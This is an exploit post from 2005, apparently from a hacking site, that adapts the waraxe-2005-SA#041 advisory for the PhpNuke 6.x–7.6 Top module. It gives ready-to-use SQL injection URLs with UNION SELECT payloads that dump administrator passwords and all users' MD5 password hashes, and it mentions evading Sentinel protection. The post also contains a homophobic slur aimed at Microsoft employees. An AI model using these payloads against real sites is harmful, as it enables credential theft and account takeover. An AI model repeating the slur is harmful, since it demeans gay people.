.....In......
--------------Modifications to waraxe-2005-SA#041------------------------
[Critical Sql Injection in PhpNuke 6.x-7.6 Top module]
(This is only changes to Waraxe's phpNuke top module exploit.)
=================================================================================================
Requirements:
*Top module must be active in victim Nuke site.
*Of course, mysql version 4.x must be used with enabled union functionality.
*If Sentinel or similar protection systems installed, additional measures must be used to evade them.
Waraxe's nuke Authors version:
http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
Shai-tan's Nuke Users version:
http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,user_password,1,1%20FROM%20nuke_users/*
This displays all users on the sites MD5's
-------Changes to waraxe-2005-SA#041-------
*Changed pwd to user_password, Changed nuke_authors to nuke_users
=================================================================================================
Thanks to waraxe's advisory "waraxe-2005-SA#041".
http://www.waraxe.us all other security places suck. (Besides the main exploit sites).
BTW: All Microsoft employees are homos (unless they use Linux at home). It's a known fact!
Need any help? email zebcarnell@gmail.com
.....Out......
Last updated on 07-24-2005 @ 12:14 pm
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 108
Members: 0
Total: 108
